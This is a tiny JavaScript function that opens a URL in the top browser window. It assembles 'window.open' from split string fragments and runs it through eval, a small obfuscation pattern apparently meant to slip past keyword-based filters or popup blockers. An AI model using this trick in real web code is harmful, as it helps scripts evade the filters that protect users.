function doit(html) 
{
	v1 = "wind";
	v2 = "ow.op";
	v3 = "en";
	
	eval(v1+v2+v3+"(html,'_top')");
}

